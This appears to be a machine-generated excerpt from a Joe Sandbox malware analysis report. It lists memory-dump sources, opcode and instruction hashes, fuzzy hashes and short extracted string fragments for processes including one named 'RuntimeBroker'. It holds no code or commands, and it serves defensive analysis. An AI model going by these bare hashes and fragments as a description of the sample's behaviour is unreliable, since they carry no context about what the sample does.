                                • Opcode ID: 47c4dc1641e7b0f277732e1916f324ad9690485bf476291288ba395ed7b8f821
                                • Instruction ID: a94297c7ede4146bbb3c38508d319870df39aba6fc746f1a902de0e411d3572d
                                • Opcode Fuzzy Hash: 47c4dc1641e7b0f277732e1916f324ad9690485bf476291288ba395ed7b8f821
                                • Instruction Fuzzy Hash: CD415D71E09A1D8FDB54EB98D8A4BECBBF1FF58301F4105AAD019E72A1DB349945CB40
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b885000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bcae03c8a373398b026f5542c06a75dd7ffc10f4fcf87c6e7448e849471ea640
                                • Instruction ID: 9efbb1514707cf5811849beb343df30664fe3f790f48b575952afb311484a1fc
                                • Opcode Fuzzy Hash: bcae03c8a373398b026f5542c06a75dd7ffc10f4fcf87c6e7448e849471ea640
                                • Instruction Fuzzy Hash: DF416B70E14A4D8FDB84EFE8D865AEDBBB1FF48310F41017AE018E3296DA346941CB81
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b885000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 123c64bad81a64d74a17771da9cf6e78408a35bcb7413a0a388e05aaa12d7d6d
                                • Instruction ID: 1371d48d680cf9640261e2ce45fc0d580b4d5194c5df2d4aca1660a9010de251
                                • Opcode Fuzzy Hash: 123c64bad81a64d74a17771da9cf6e78408a35bcb7413a0a388e05aaa12d7d6d
                                • Instruction Fuzzy Hash: 3B418070D0965D8FEB55DFA4C864AEDB7B1FF49300F1101BAD019D729ACB399981CB41
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b885000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b0e0fb92451cc1fc14ad87ee0c46ccda97dac53ac31597343129f78dfcc28322
                                • Instruction ID: 48fcc4602367bde0715d6d6cbe19621428b49a5a8c787c89ff6e5876b857fdc6
                                • Opcode Fuzzy Hash: b0e0fb92451cc1fc14ad87ee0c46ccda97dac53ac31597343129f78dfcc28322
                                • Instruction Fuzzy Hash: B542D670E1962D8FDBA8DF68C890BEDB7B1FF58301F5041A9D05DA7295DA346A81CF40
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID: =O_^$?O_I$O_^X$O_^f$O_^g
                                • API String ID: 0-2229697781
                                • Opcode ID: c0aae7f619c72a7d34a5754a6e1a0bad23f77d0228dafcfe696c9c02ba0d8583
                                • Instruction ID: 830afeb749aa1034fd8ad5ce9fc9ae177ac7369e4500445d1f2231cb7a6b684c
                                • Opcode Fuzzy Hash: c0aae7f619c72a7d34a5754a6e1a0bad23f77d0228dafcfe696c9c02ba0d8583
                                • Instruction Fuzzy Hash: B8618B63B0FA895FEB21679C7C651E83BA0FF85721B0501F7E06C8B1A7EC3469468381
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID: &
                                • API String ID: 0-2822232526
                                • Opcode ID: 8f5c92dea6dcdfcc7bac974d0f7df484c5f00b0c73e73db0636be202b25c5d02
                                • Instruction ID: c6ff53ac27acfa268a1b92912935eb091b25625a40de8ce09f52d00d2af0eb81
                                • Opcode Fuzzy Hash: 8f5c92dea6dcdfcc7bac974d0f7df484c5f00b0c73e73db0636be202b25c5d02
                                • Instruction Fuzzy Hash: 70D13F71E19A5D8FEB5CDB58D8A4BACB7B1FF58300F4441B9E01DE32A6DA346981CB01
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID: ?O_^
                                • API String ID: 0-1127923838
                                • Opcode ID: ef945f1706b72cf49d13fc5cc5572387a099ee51a8e78cabce076d5f4f9d5d45
                                • Instruction ID: bb51e7dd59e50f40135fd3801b95d70a1a48146bff9db65f52470e26cb1b2de1
                                • Opcode Fuzzy Hash: ef945f1706b72cf49d13fc5cc5572387a099ee51a8e78cabce076d5f4f9d5d45
                                • Instruction Fuzzy Hash: 5301D231A0A65E8FC756EF6898A15F637A0FF05318F04017AE06CCA193EE38A555C791
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f503292211ca5e3e6325d61f88441414949fe1898415304fa30686a7af93a766
                                • Instruction ID: e94f7477746e11276959438d61ba36926db5d89d2fd1a4adb1364317441380a7
                                • Opcode Fuzzy Hash: f503292211ca5e3e6325d61f88441414949fe1898415304fa30686a7af93a766
                                • Instruction Fuzzy Hash: BEC18B74A0AA1DCFEBA5DBA8C4957BC77B1FF58301F5141B9C01DD72A6CA386982CB40
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 016bae84c9833ea51a330e98985b215d400997632f3dc20f40a64b79aa758a90
                                • Instruction ID: ea4b5eaa335638d88dd602e3a0051662426f968d1270de9ae65784296307a287
                                • Opcode Fuzzy Hash: 016bae84c9833ea51a330e98985b215d400997632f3dc20f40a64b79aa758a90
                                • Instruction Fuzzy Hash: 60B15271E19A5D8FEB9CDB58D864BA8B7A1FF58300F0401B9E01DD72E6DE346981CB01
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 01bbf8e50bf36370b69fb5aa69bd9ef99db34f326d0c652107f9ccd778e1ff16
                                • Instruction ID: 5508ef69b63f5e3adaf1975dd8308f1c9f0e47ddbfa512388eaa37b1b539d82e
                                • Opcode Fuzzy Hash: 01bbf8e50bf36370b69fb5aa69bd9ef99db34f326d0c652107f9ccd778e1ff16
                                • Instruction Fuzzy Hash: BB81C231B1DE494BDB68EF5888605B977E2FF9C704B15417EE46EC32A2DE34AD028781
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f95e884c2a7c0203d9ce30cb166406e2a3d5f7f898afcf774b6eccdb80d8e698
                                • Instruction ID: 009b58a162401399a357b9088ad46143b888c948cba1c63c144940808660d634
                                • Opcode Fuzzy Hash: f95e884c2a7c0203d9ce30cb166406e2a3d5f7f898afcf774b6eccdb80d8e698
                                • Instruction Fuzzy Hash: 35719470E14A1D8FEB94EFA8D895BECB7B1FF58300F5041BAD41DE3296DA3469818B41
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5ae674243f1d554a8079076d9a8941308ff9d3c1027d4da7409e95daaa2f6bc4
                                • Instruction ID: cc33624e63c8a795ed916fe0597753e52f242293ae017d1f46691da0bc5a88ff
                                • Opcode Fuzzy Hash: 5ae674243f1d554a8079076d9a8941308ff9d3c1027d4da7409e95daaa2f6bc4
                                • Instruction Fuzzy Hash: 7051C031B18A8E4FDB58DF1888645BA77E2FF9C304B15417EE46EC7292DE34E9028781
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 560e0246001dc2aa6563182902685101808f3b659950fc0c388b1228830068c0
                                • Instruction ID: f7265e2cbb0f54c24ec97903a3b5348035567ebd98c9c27d109c1ad97466bcd2
                                • Opcode Fuzzy Hash: 560e0246001dc2aa6563182902685101808f3b659950fc0c388b1228830068c0
                                • Instruction Fuzzy Hash: 0E513071A1995D8FDB94EF98C865AECBBF1FF59300F41016AE01DE72A2CA74A941CB40
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8e002b6011d4ab12d7181614d8a0b9baf8ce2d4272ffdcaaa11e20261c38aee7
                                • Instruction ID: 5e008922eb80c9f7240ec87733c0ae67488c2927b5078b0c58119db938337675
                                • Opcode Fuzzy Hash: 8e002b6011d4ab12d7181614d8a0b9baf8ce2d4272ffdcaaa11e20261c38aee7
                                • Instruction Fuzzy Hash: 5A51D661A0EA994FEBA29BA88C657A87BA0EF59300F0540F7D09CC71E7DD346E85C741
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2957f27167f2bcdf61b10592efc8bd3d800d2879cb405db88ff17afee2cac51a
                                • Instruction ID: cfecb87381bc0584b196ba68d82882aaf02ce97d1dba5682117e0c51c367ed29
                                • Opcode Fuzzy Hash: 2957f27167f2bcdf61b10592efc8bd3d800d2879cb405db88ff17afee2cac51a
                                • Instruction Fuzzy Hash: E8317530E1EA1D8BE774BB9494227F8B2A1FF4D700F410279D06E921E5CF396A45C680
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                • Instruction ID: da55470e1b49eb9cd75ce2e2de4c7be7a725ab6cbe6257f346bc14b848454f2c
                                • Opcode Fuzzy Hash: fa2b9c1c3615b0ff49bb94c8ef0daa8d6667f2c43736e82f4041d7cb380a4b23
                                • Instruction Fuzzy Hash: B251EA61A0E6AD4EE7A1DB785C657A87FA0EF59300F0540F7D04CC71E7DD246A85CB81
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 19c11b897622cc26e9ae3ea4dbf341ced46936d6eab94a247ffb236bbd8a44e4
                                • Instruction ID: 4038fbd651bdc98d643b6345575ee21a89d3c274c2b9e7c1e0627acc3fa9f97c
                                • Opcode Fuzzy Hash: 19c11b897622cc26e9ae3ea4dbf341ced46936d6eab94a247ffb236bbd8a44e4
                                • Instruction Fuzzy Hash: F2319530E2E62E8AE774BB6084217F9B2A1FF4A300F410279D05E961E5CF396A45CEC0
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 610dc8da61fef79331d646f7d0e187308260ce5ca413a02e94c08a520c1c7d60
                                • Instruction ID: 78fb895b339f0899dc52e5e28edc2235ca6719075ffd5369f032d6ddbce231ab
                                • Opcode Fuzzy Hash: 610dc8da61fef79331d646f7d0e187308260ce5ca413a02e94c08a520c1c7d60
                                • Instruction Fuzzy Hash: A3414F35E1991D8FDB54EBA8C864AECB7F1FF58301F4501AAD009D72A1DB38A945CB40
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 12c30d2168472cc464fa03dbc8041f4326f9c4ec561bea11b53952d9708901ea
                                • Instruction ID: 8fc1b57a1a7cace735c61269bd18007d06048da18083627cb710edeb93be7b6d
                                • Opcode Fuzzy Hash: 12c30d2168472cc464fa03dbc8041f4326f9c4ec561bea11b53952d9708901ea
                                • Instruction Fuzzy Hash: 52417E70E1865D8FEB84EBE8D865AEDBBF1FF48310F050176E008E3296DA346941CB81
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2aa06373c588958f288d7a96394d21ce15959b9ceedb8610328f8d1c83ade68f
                                • Instruction ID: c6ace5dabad8ecd12ef60bfa2166d5b3274131e54f39f13fd387b5aac1dc4d47
                                • Opcode Fuzzy Hash: 2aa06373c588958f288d7a96394d21ce15959b9ceedb8610328f8d1c83ade68f
                                • Instruction Fuzzy Hash: B7418D70D096598FEB55DFA4C864AEDBBB1FF4A300F1101BAD009D72AACB399981CF41
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e003b974fb99f75c57cfb232c7236ecac21d64b0a66a7e0c724713780b4c2dee
                                • Instruction ID: 841c50912140893046c0cf43bcb562c08c272aca38ae3e53d3f0154a6c1eabcc
                                • Opcode Fuzzy Hash: e003b974fb99f75c57cfb232c7236ecac21d64b0a66a7e0c724713780b4c2dee
                                • Instruction Fuzzy Hash: 4E315B31E0962E8FDB58DFA4D4646FEB7B1EF58310F11017AE019A32D5CA385A41CF91
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 08369939351e97a9d62d805df70290a1c39d4a45c59b786840828c976cba7225
                                • Instruction ID: 64f39b689dc0abcfb259b21754ae928f55c61ec6a161fe6cff74156d50e160c2
                                • Opcode Fuzzy Hash: 08369939351e97a9d62d805df70290a1c39d4a45c59b786840828c976cba7225
                                • Instruction Fuzzy Hash: C7312A70E0A65D8FDB55DFA8D8606EDBBB1FF59301F10057AE019E3291DB389941CB81
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fa0656c8f07a8f4ed4b9008ce63a973b64a4e458b764a3a5847623afb69d05a2
                                • Instruction ID: e9b9f61658df2410027c7902e4a96103d3a4fd71bdc67feb21cdb921bf1592d7
                                • Opcode Fuzzy Hash: fa0656c8f07a8f4ed4b9008ce63a973b64a4e458b764a3a5847623afb69d05a2
                                • Instruction Fuzzy Hash: 21110D31E2A52D8ED768EB60D4657FCB271FF06701F4110B9D04EA61A2CE356A44CF80
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 967534f215c89adcdea066bd628afff681ca93b6a0bee11090503a032cd1183c
                                • Instruction ID: b7d25fad3fdb62016c98c28f9199eac6e32ee2131746b90aaa72002e8571677a
                                • Opcode Fuzzy Hash: 967534f215c89adcdea066bd628afff681ca93b6a0bee11090503a032cd1183c
                                • Instruction Fuzzy Hash: BBF02230A1964D8FE794EB7888A95EC7FB0EF88300F8105FAD408C61A2DF3816498B41
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2bbcd1004c88310f512072129159ed670e10f3c9551bbc66664b70b8cb2f14cf
                                • Instruction ID: b3dd33997ff545a3b8c5f8b4a0e67fddb5587f634228041c7caa2166d41074c7
                                • Opcode Fuzzy Hash: 2bbcd1004c88310f512072129159ed670e10f3c9551bbc66664b70b8cb2f14cf
                                • Instruction Fuzzy Hash: EBF02831A1E64D5FD751EB788C655EC7FA0EF48200F4101F6D418CB2E3DB28A949C781
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c27bb3ca9f1c2fc609b5d40c53f8eacd38f7d0e0ac17b7e669fb430352200e87
                                • Instruction ID: c9dfec9c63295712f4ebe7c97c3728425da9bc93592a6970de723ad899e62fc2
                                • Opcode Fuzzy Hash: c27bb3ca9f1c2fc609b5d40c53f8eacd38f7d0e0ac17b7e669fb430352200e87
                                • Instruction Fuzzy Hash: B8F0BE3050E64D8FCB66EF24C8516E93BA0FF5A300F0501AAE41CCB196CB7ADA64CB81
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6b91e7c98b9878ab8cf11bd1f0b471b09b2e3e49361a1c3e43fd0a9404036fa5
                                • Instruction ID: 55d01ff5bafa4e73ee4dfff47579ebfa46199806e6b158613a0b2589a0ba6d08
                                • Opcode Fuzzy Hash: 6b91e7c98b9878ab8cf11bd1f0b471b09b2e3e49361a1c3e43fd0a9404036fa5
                                • Instruction Fuzzy Hash: 7AF08C3180D68D8FEB51EB6888682ED7FF0FF19300F0504A7D018D60A2D7346544CB41
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 432d24d1fd1050ca00c0840a8a7201cd64d0db7f0804005701bda6b8cd227d0c
                                • Instruction ID: c14000dea9572f4d7f9f3dff157658dc6dd583c9076c943b63c4709b4fbfd70e
                                • Opcode Fuzzy Hash: 432d24d1fd1050ca00c0840a8a7201cd64d0db7f0804005701bda6b8cd227d0c
                                • Instruction Fuzzy Hash: B5F0823050960ECFDB69EF64D4116F577A0FF59304F000176E41CD71D6CA35A660CB81
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 35853afa75b69b8af2630670ab5a25cd29eb57b7b51ebb0d863fcffa3e8693d1
                                • Instruction ID: 93c7a68d977ef0b3331224a72bb2fcc2e540af28af874aaf0a4721c2dcc070e6
                                • Opcode Fuzzy Hash: 35853afa75b69b8af2630670ab5a25cd29eb57b7b51ebb0d863fcffa3e8693d1
                                • Instruction Fuzzy Hash: A1E0DF7298DE5C8BDF64AB699C2029877B1FB8D308F01026EE48CC7191E7355EA6CB41
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5b18e3ae6d68f1bc2f74094ee4ecbd4cf08eb6e3b416cb339c5958d286e9631b
                                • Instruction ID: a0bda24ba1446f777d164d855fed1601e2c05d2f4986bf1417e8ded4d3dd6b5c
                                • Opcode Fuzzy Hash: 5b18e3ae6d68f1bc2f74094ee4ecbd4cf08eb6e3b416cb339c5958d286e9631b
                                • Instruction Fuzzy Hash: 36E0C03190DA0C4BCB509FAD9C602C873B0FB4C308F01026DD44CC71C1D3319544C741
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 23ba22b8572c9bb666e20d31bca06677ba9c48c0ae40591f7c4364df5adebe8f
                                • Instruction ID: 8bebb03e8e9f82e6d93361e3adf8cf6e57b0d7ea40d1fe8a6e5ee34cc2699785
                                • Opcode Fuzzy Hash: 23ba22b8572c9bb666e20d31bca06677ba9c48c0ae40591f7c4364df5adebe8f
                                • Instruction Fuzzy Hash: 02E09B3185F69E4FD7216F6049651DD7B60FF05300F0616BBD0588A1D3D76C9618CB81
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d24992e485735ca18b3b10e06babd7af33ca46ad9845132f942a62b29df2134c
                                • Instruction ID: 1cc1f3f5f1927b86c6c415b5c3a98059dc78c018205414e97c9c95f8e4fe0153
                                • Opcode Fuzzy Hash: d24992e485735ca18b3b10e06babd7af33ca46ad9845132f942a62b29df2134c
                                • Instruction Fuzzy Hash: 4EF0A03194F39E4FDB626B6048A11D97B70FF06200F0A06BAD058CA1E3DA6896588782
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 861076b9b8e08a3fc39f9f92f7ad52cc1c98003d172323b3f9510822f9d4476c
                                • Instruction ID: f2b17b496262ebfd906a1944a39620664c78ce795186dde038c4a621c253532c
                                • Opcode Fuzzy Hash: 861076b9b8e08a3fc39f9f92f7ad52cc1c98003d172323b3f9510822f9d4476c
                                • Instruction Fuzzy Hash: 77F0197191485D4FDFA4DF24C854B99B3B1FB58344F1086E6900DE3155DA30AEC58F80
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4052877536065a422ffdacf6b0f575e94888fbc971f21f8d59286a0c27209402
                                • Instruction ID: 54dc86a14f543349dc7700b5e0320e69aa6d7c8dd2378ae33cffcb442974c070
                                • Opcode Fuzzy Hash: 4052877536065a422ffdacf6b0f575e94888fbc971f21f8d59286a0c27209402
                                • Instruction Fuzzy Hash: BCE04F3051960ECFDBA8EF68C450AA677A1FF58304F100539E41CD6190CB35E6A0CFC0
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 915a2728d9e7f5ebec5ed1afa031da61babc95869f818d8781a71a5c371f7729
                                • Instruction ID: 619ba90539dd75053b89fd44b3d6e99274cc688a065b3c0578aa223bfcdb4096
                                • Opcode Fuzzy Hash: 915a2728d9e7f5ebec5ed1afa031da61babc95869f818d8781a71a5c371f7729
                                • Instruction Fuzzy Hash: 5EE0EC31F1552D8EDB58EB98E8117EDB771FF85311F8005B1D11CE3596DA3069458B81
                                Strings
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID: =L_^$?L_I$L_^U$L_^X$L_^f$L_^g
                                • API String ID: 0-3399030255
                                • Opcode ID: f4801156bbce5df0b5c6c10c682d22bfe4ea4dfb296037fc788a2b4cf71e8952
                                • Instruction ID: 6a395c2d2ba314665f3511997b977dd68493e6623f08d83c5490d6e986db0b67
